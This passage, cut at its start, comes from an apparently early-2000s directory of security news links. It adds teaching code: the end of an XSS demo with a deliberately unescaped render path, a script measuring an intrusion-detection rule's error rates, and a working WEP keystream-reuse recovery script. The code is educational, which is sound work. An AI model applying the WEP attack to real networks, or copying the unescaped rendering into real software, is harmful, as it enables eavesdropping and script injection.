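    #    the victim's browser under example.test's origin (cookies, session).
    unsafe_page = render_vulnerable(TEMPLATE, query=query)

    # 2. Taint check: the same call with the raw value is refused.
    try:
        render_checked(TEMPLATE, query=query)
        refused = False
    except ValueError:
        refused = True

    # 3. Correct: escape at the output boundary, then render.
    safe_page = render_checked(TEMPLATE, query=escape(query))
    return unsafe_page, refused, safe_page


if __name__ == "__main__":
    unsafe, refused, safe = demo()
    print("vulnerable:", unsafe)
    print("refused raw tainted value:", refused)
    print("escaped:   ", safe)
```

The escaping shown is for HTML body context only; data placed inside an attribute, a URL or a script block needs the encoding for that context, which is why the taint check (refuse anything that has not been explicitly handled) is the more robust half of the pair.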

Privacy Advocate Shifts Gears
Richard Smith is resigning his position as CTO of the Privacy Foundation to work as an independent security consultant. (11/8/2001 at Wired News)

The Privacy War of Richard Smith
Richard Smith, a privacy advocate who's technically savvy enough to deconstruct software and determine when users' privacy is violated, is respected and feared throughout the software industry. (2/10/2000 at Business Week)

A Private Little Cyberwar
Jay Dyson's crusade against Hagis - "Hackers Against Geeks in Snowsuits" - has cost him his marriage and his health. (2/7/2000 at Forbes)

Protecting User Passwords
How to implement a secure method, using MD5 and JavaScript, for users to authenticate to a website. (1/31/2000 at builder.com)

Putting Some Teeth in Cybersecurity
Some security firms believe that owners of insecure computers which are used to launch attacks over the Internet may one day be sued for their negligence. (3/17/2000 at The Christian Science Monitor)

Researchers Refuse Carnivore Review
Several groups of researchers have refused to review Carnivore, the Justice Department's controversial email-tapping system, due to what they call unacceptable restrictions by the government. (9/6/2000 at USA Today)

Researchers: Newest Microsoft IE Patch Flawed
Security researcher Thor Larholm and Israeli group GreyMagic Software say Microsoft's latest Internet Explorer patch doesn't fix all the vulnerabilities it claims. (5/20/2002 at CNN)

RSA Releases Patents Two Weeks Early
RSA Security Inc. released its cryptographic patent to the public domain on September 6, 2000, rather than wait for the patent to expire on September 20. (9/6/2000 at ZDNet)

The Scent of an Easy Prey
ShareSniffer is idiot-proof software that lets anyone scan a range of IP addresses for shared files on Windows machines; creator Kerry Rogers says he wrote it to encourage the sharing of information on the Internet. (3/15/2001 at Business Week)

Securing Connections to Your Web Site
A look at how to provide secure connections to your website: symmetric and asymmetric encryption, SSL, HTTPS. (7/13/2001 at Web Review)

Securing Outlook, Part One: Initial Configuration
Initial steps that users can take to reduce security problems with Microsoft's email program, Outlook. (12/10/2002 at SecurityFocus)

Security and Apache: An Essential Primer
A long, detailed explanation of how Apache security works - restricting access by password or IP address, how realms work, and more. (2/21/2000 at Linux Planet)

Security Flaws Found in PHP
Stefan Esser of e-matters found multiple vulnerabilities in several versions of PHP; users are urged to upgrade to PHP 4.1.2. (2/28/2002 at InternetNews.com)

Security Guru Says Known Vulnerabilities Are No. 1 Hacker Exploit
According to security expert Ira Winkler, there are now 50,000-100,000 "hackers" (read: crackers) worldwide, most of whom could be stopped if system administrators installed known patches for known vulnerabilities. (12/16/1999 at InfoWorld)

Security: 3 Confabs' Killer App
Three tech conferences held simultaneously in the Javits Convention Center in New York - Internet World Wireless East, Pocket PC, and Seybold Seminars - focused a great deal of time on security and digital rights management. (2/21/2002 at Wired News)

Setting Up a MySQL Based Website - Part II
How to use MySQL to control user access to your site. (1/24/2000 at Linux Planet)

Shockwave Computer Virus Found, Threat Low
Security experts have been sent a Shockwave Flash virus called SWF/LFM.926. (1/8/2002 at Yahoo News)

A Short History of Computer Viruses and Attacks
A history of computer viruses and attacks, from 1945 to 2003. (2/14/2003 at SecurityFocus)

Simpler Ways to Stymie Cyberthiefs
Suggestions on how credit card companies can make online credit card use more secure, with minimal extra effort required by both consumers and merchants. One solution: build smart-card readers into computer keyboards, and require buyers to use a PIN. (3/6/2001 at Business Week)

Size Matters: Gnutella Worm Leaves a Trail
A "proof of concept" worm has been released on Gnutella; it has spread very slowly, but demonstrates the ability to spread unwanted programs on file-sharing networks. (2/27/2001 at ZDNet)

So Long, and Thanks for All the Fish
Elias Levy, aka Aleph1, is giving up his duties as moderator of the popular BugTraq mailing list; he will be replaced by David Ahmad. (10/15/2001 at SecurityFocus)

Software That Asks "Who Goes There?"
Companies including Courion, Access 360, M-Tech, Computer Associates, and others hope to sell large companies on technology that automates assigning new passwords to employees who have forgotten theirs. (2/26/2002 at Business Week)

Specter of Web Attacks Looms Anew
At the 2000 DefCon conference in Las Vegas, white-hat hacker Simple Nomad, who last year anticipated the denial-of-service (DoS) attacks that hit large commercial sites in February 2000, revealed a new blueprint for untraceable DoS attacks. (8/6/2000 at ZDNet)

Stealing MS Passport's Wallet
Software developer Marc Slemko demonstrated the insecurity of Microsoft's Passport by showing how to obtain a Hotmail user's credit card information merely by getting the user to open an email message. (11/2/2001 at Wired News)

Strategies to Reduce False Positives and False Negatives
A brief overview of network-based intrusion detection systems, and the false positives (alerts on benign traffic) and false negatives (attacks that raise no alert) they generate when flagging unauthorized connections. (9/11/2001 at SecurityFocus)
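
An added example, not from the SecurityFocus article, of what those two error types look like when a rule is measured against labelled traffic. The rule (a "port sweep" signature: one source reaching at least a threshold of distinct ports on one host inside a time window), the log format, the traffic and the ground-truth labels are all constructed here; the point is that lowering the threshold turns benign hosts into false positives, while a slow scan stays a false negative at every threshold because the rule's window is too short.

```python
"""Measuring a NIDS rule's false positives and false negatives on labelled traffic.

Added example, not from the SecurityFocus article. The rule, the log format
("epoch_seconds src dst dport") and the traffic are constructed. SCANNERS is
the ground truth, so the confusion counts show how the detection threshold
trades false alarms against misses.
"""
from collections import defaultdict

WINDOW = 10.0  # seconds a sweep must fit inside to be noticed by the rule

# Constructed connection log (assumed format: "epoch_seconds src dst dport").
LOG = """\
1000.0 10.0.0.5 192.168.1.10 21
1000.2 10.0.0.5 192.168.1.10 22
1000.4 10.0.0.5 192.168.1.10 23
1000.6 10.0.0.5 192.168.1.10 25
1000.8 10.0.0.5 192.168.1.10 80
1001.0 10.0.0.5 192.168.1.10 110
1001.2 10.0.0.5 192.168.1.10 143
1001.4 10.0.0.5 192.168.1.10 443
1005.0 10.0.0.7 192.168.1.10 22
1005.3 10.0.0.7 192.168.1.10 80
1005.6 10.0.0.7 192.168.1.10 443
1010.0 10.0.0.9 192.168.1.10 80
1012.0 10.0.0.9 192.168.1.10 443
1020.0 10.0.0.11 192.168.1.10 21
1050.0 10.0.0.11 192.168.1.10 22
1080.0 10.0.0.11 192.168.1.10 23
1110.0 10.0.0.11 192.168.1.10 25
1140.0 10.0.0.11 192.168.1.10 80
1170.0 10.0.0.11 192.168.1.10 110
1030.0 10.0.0.13 192.168.1.20 22
1030.5 10.0.0.13 192.168.1.20 873
1031.0 10.0.0.13 192.168.1.20 3306
"""

# Ground truth (constructed): 10.0.0.5 is a fast scanner, 10.0.0.11 a slow one
# (one port every 30 s); 10.0.0.7 is a monitoring host, 10.0.0.9 a browser,
# 10.0.0.13 a backup job talking to ssh, rsync and MySQL.
SCANNERS = {"10.0.0.5", "10.0.0.11"}


def parse_log(text):
    events = []
    for line in text.splitlines():
        ts, src, dst, dport = line.split()
        events.append((float(ts), src, dst, int(dport)))
    return events


def port_sweep_alerts(events, threshold, window=WINDOW):
    """Return the set of sources the rule flags."""
    by_flow = defaultdict(list)
    for ts, src, dst, dport in events:
        by_flow[(src, dst)].append((ts, dport))
    flagged = set()
    for (src, _dst), hits in by_flow.items():
        hits.sort()
        for i, (t0, _p) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - t0 <= window}
            if len(ports) >= threshold:
                flagged.add(src)
                break
    return flagged


def evaluate(threshold):
    """Confusion counts (tp, fp, fn, tn) over all sources in the log."""
    events = parse_log(LOG)
    sources = {src for _t, src, _d, _p in events}
    flagged = port_sweep_alerts(events, threshold)
    tp = len(flagged & SCANNERS)
    fp = len(flagged - SCANNERS)
    fn = len(SCANNERS - flagged)
    tn = len(sources - flagged - SCANNERS)
    return tp, fp, fn, tn


if __name__ == "__main__":
    for threshold in (3, 5, 9):
        tp, fp, fn, tn = evaluate(threshold)
        print(f"threshold={threshold}: tp={tp} fp={fp} fn={fn} tn={tn}")
```

With this traffic a threshold of 3 catches the fast scanner but also flags the monitor and the backup host; 5 removes those false positives; 9 misses everything. The slow scanner is a false negative throughout, which no threshold fixes: that is a limit of the rule's 10-second window, not of its sensitivity.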

Study: Many Still Lax on Securing DNS
A survey by an Iceland-based DNS consultancy indicates that the pace at which Internet sites are upgrading to a secure version of BIND has slowed dramatically; 13.1% of dot-coms are supposedly still running insecure versions. (3/2/2001 at InfoWorld)

Study: Money Alone Won't Shoo Away Hackers
A study from magazine Information Security said that cyberattacks are on the rise, though security spending has doubled in a year; 8 out of 10 companies were attacked; and companies need to pay more attention to insider (employee) attacks. (10/5/2000 at The Industry Standard)

Sudo Contains Root Exploit
Unix and open-source security advisories: buffer overflows in sudo and innfeed; race conditions in Samba and VMware; and more. (4/24/2001 at O'Reilly Network)

Symmetric Cryptography in Perl
Implementing ciphers with Perl, using the TwoFish module. (7/10/2001 at Perl.com)

Technology Will Play Bigger Role in Security
In the wake of the terrorist attacks on the WTC and Pentagon, national electronic ID cards may be issued, law enforcement officials granted greater surveillance powers, and routine video surveillance increased. (9/18/2001 at The New York Times)

The Terrorists Are Winning the Cyber War
Due to poor interagency communication, antiquated equipment, rapidly-advancing technology, and the availability of very effective cryptography, the U.S. government is finding it hard to monitor terrorists' activities online. (9/19/2001 at Los Angeles Times)

Terrorists' Online Methods Elusive
U.S. federal officials, believing that Osama bin Laden and his associates are using encryption and steganography to communicate over the Internet undetected, are calling on Internet encryption experts to be ready to help investigations. (9/18/2001 at The Washington Post)

The 21 Best Ways to Lose Your Information
A tongue-in-cheek look at common ways people compromise their security. (8/23/2002 at SecurityFocus)

The Cross-Site Scripting Scam
A theory concerning Microsoft's warning about the cross-site scripting security problem: it's a ploy to scare citizens so that they don't engage in "promiscuous surfing" - that is, looking at non-corporate websites. (2/7/2000 at ZDNet)

The Third Wave of Network Attacks
The first attacks against computers were physical (pulling out wires, theft of hardware); the second, syntactic (attacking the logic of software and networks). The third wave will be semantic: fooling people and computers with false content (aka fraud). (10/3/2000 at ZDNet)

The Web Whodunit
A run-down of the various theories concerning who's behind the DoS attacks that hit eBay, buy.com, and other major sites, and links to articles detailing the theories. (2/10/2000 at Salon.com)

Top 10 Security Stories of 2000
The VBS/Kakworm, Israelis and Palestinians hacking each other, the malleable Hybris virus, always-connected home PCs becoming security risks, DoS attacks, ILOVEYOU... (12/24/2000 at ZDNet)

Top 10 Vulnerabilities in Web Applications
Discussion of the Open Web Application Security Project's (OWASP) list of the top 10 security vulnerabilities in web applications. (1/13/2003 at Slashdot.org)

Toward More Cybersecurity in 2002
Resolutions to make the Net safer in 2002: Microsoft must get serious about security; firewalls should be mandatory; router security should improve; and the government should handle its own cybersecurity better. (1/2/2002 at SecurityFocus)

Trouble Indemnity for Web Sites
Companies are offering websites insurance against loss due to disgruntled employees, crackers, viruses, and extortion. (1/20/2000 at Wired News)

The Twenty Most Critical Internet Security Holes
Discussion of the SANS Institute and the National Infrastructure Protection Center (NIPC)'s updated document on the 20 most critical security holes on the Internet. (10/3/2001 at Slashdot.org)

Two Views of Hacking
Interviews on hacking and cracking with hacker Emmanuel Goldstein, editor-in-chief of 2600: The Hacker Quarterly; and Dr. Charles C. Palmer, a computer security expert for IBM. (9/30/2000 at The New York Times)

U.S. Cyber Security Weakening
According to the Computer Science and Telecommunications Board, computer and network security is getting worse, because vendors and end-users don't implement readily-available recommended security measures. (1/8/2002 at Wired News)

U.S. Picks New Crypto Standard
The U.S. government has chosen Rijndael as the new encryption standard (the Advanced Encryption Standard, AES) it will use to encrypt sensitive government data. (10/2/2000 at Wired News)

Uncovering the Secrets of SE Linux: Part 1
An in-depth look at how SE Linux, the security-enhanced Linux released by the National Security Agency (NSA), improves on Linux's typical security models. (3/8/2001 at IBM)

Using SSH Tunneling
How to forward arbitrary TCP traffic through an encrypted SSH connection between two ssh-enabled machines. (2/23/2001 at O'Reilly Network)

War Driving by the Bay
Security consultant Peter Shipley, armed with a laptop and an external antenna, plans to map out 802.11 networks throughout the San Francisco Bay Area; the wireless networks provide a hole through the firewalls of the corporations that run them. (4/13/2001 at The Register)

Warning From Microsoft on False Digital Signatures
A hacker convinced VeriSign Inc., a certificate authority, to issue him or her code-signing certificates in Microsoft's name; VeriSign says this is the first time that something like this has happened. (3/23/2001 at The New York Times)

Webserver Security (Part I)
A basic look at web server security, focusing on determining TCP ports to keep open and network configuration. (4/19/2000 at DevShed)

Welcome to the Era of Cyber-Contagion
Because computers are growing more and more interconnected through networks and new messaging protocols, we can expect more rapidly-spreading viruses like "I Love You." (5/9/2000 at Business Week)

Western Union Web Site Hacked
Western Union's website, www.westernunion.com, was cracked on September 8th; the crackers copied the credit card information of 15,700 customers before Western Union turned the site off. (9/10/2000 at MSNBC)

What You Need to Know Before Setting up a Firewall
How to write a sensible security policy, and who should be involved in the writing. (12/14/2000 at IBM)

What's Up With WEP?
Security problems with Wired Equivalent Privacy (WEP), the encryption built into 802.11 wireless networks: how serious the problems are, and how they should be dealt with. (4/26/2001 at IBM)
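
An added example, not from the IBM article, of the best-known of those problems: WEP builds each frame's RC4 key from a 24-bit initialization vector (sent in the clear) prepended to the shared key, so any two frames sent under the same IV are encrypted with the same keystream. XORing the two ciphertexts cancels the keystream, and one known plaintext then exposes the other. The RC4 routine and the IV-plus-key layout are WEP's real ones; the shared key, the IV and the two frame payloads are constructed, and WEP's integrity check and padding are left out.

```python
"""Why WEP's 24-bit IV is a problem: two frames under one IV share a keystream.

Added example, not from the IBM article. RC4 here is the standard KSA/PRGA;
the per-packet key layout (3-byte IV prepended to the shared key) is how WEP
derives its RC4 key. The key, IV and frame contents are constructed.
"""


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: key-scheduling algorithm, then the output generator."""
    s = list(range(256))
    j = 0
    for i in range(256):  # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):  # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style: per-packet RC4 key = IV || shared key; the IV travels in clear."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    keystream = rc4_keystream(iv + shared_key, len(plaintext))
    return iv + xor(plaintext, keystream)


SHARED_KEY = b"\x0b\xad\xc0\xff\xee"  # constructed 40-bit WEP key
IV = b"\x01\x02\x03"                  # the IV the card happens to reuse

# Constructed frame payloads. The attacker can guess FRAME_A (a predictable
# request) and wants FRAME_B.
FRAME_A = b"GET /index.html HTTP/1.0\r\n"
FRAME_B = b"PASS hunter2hunter2hunte\r\n"


def recover_with_known_plaintext(cipher_a: bytes, cipher_b: bytes,
                                 known_plain_a: bytes) -> bytes:
    """Same IV => same keystream, so C_a XOR C_b = P_a XOR P_b.

    Knowing P_a therefore yields P_b (and, as a side effect, the keystream
    itself, reusable against every later frame carrying this IV)."""
    iv_a, iv_b = cipher_a[:3], cipher_b[:3]
    if iv_a != iv_b:
        raise ValueError("IVs differ; the keystreams are not shared")
    body_a, body_b = cipher_a[3:], cipher_b[3:]
    keystream = xor(body_a, known_plain_a)
    return xor(body_b, keystream)


def demo() -> bytes:
    ca = wep_encrypt(SHARED_KEY, IV, FRAME_A)
    cb = wep_encrypt(SHARED_KEY, IV, FRAME_B)
    return recover_with_known_plaintext(ca, cb, FRAME_A)


if __name__ == "__main__":
    print(demo())
```

Only 2**24 IVs exist, and many cards simply count upward from zero on reset, so a busy access point repeats IVs within hours; the attack needs no knowledge of the shared key at all.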

Who Do Cops Call? Virus-Busters
Richard Smith, Fredrik Bjorck and Jonathan James, the trio primarily responsible for tracking down the author of the Melissa virus, worked together again to track down the creator(s) of the "Love Bug"/ILOVEYOU virus. (5/12/2000 at Wired News)

Who's Going to Train the Cyber Security Pros?
Despite the need for more computer security workers, such people are not being trained; too often, teachers are lured to high-paying jobs working in the field. (2/16/2000 at Business Week)

Why RSA's Loss Is Everyone Else's Gain
On September 20, 2000, RSA's patent on its public-key encryption algorithm will expire. This will probably mean cheaper encryption software for the consumer, and most likely won't hurt RSA. (1/23/2000 at ZDNet)

Why Worm Writers Stay Free
Virus and worm writers often brag about their exploits and aren't caught anyway; as with non-computer crimes, investigators only have limited resources with which to investigate crimes, and rely on tips from the public to catch criminals. (12/27/2001 at Wired News)

Win2000 Security Hole a 'Major Threat'
Security expert David Litchfield has uncovered a major security bug in Win2000 even before the operating system officially started shipping. (1/28/2000 at ZDNet)

Windows ME Bugged by Flaw
Windows ME is vulnerable to a denial-of-service attack which was first identified on Windows 98. (9/14/2000 at Wired News)

Wired News 'Love Bug' Coverage
A series of articles from Wired News on the "Love Bug," the early-May 2000 worm/virus that spreads via VBScript email attachments. (5/6/2000 at Wired News)

XSS, Trust, and Barney
A look at how new (and old) web technologies, and browser bugs, enable cross-site scripting - in which a link from one web page carries script or unexpected data to a second website, which echoes it back to the visitor's browser and so lets it run with that site's trust. (4/27/2000 at WebMonkey)

(c) 1998-2000 ep Productions, Inc. All rights reserved. Terms of use.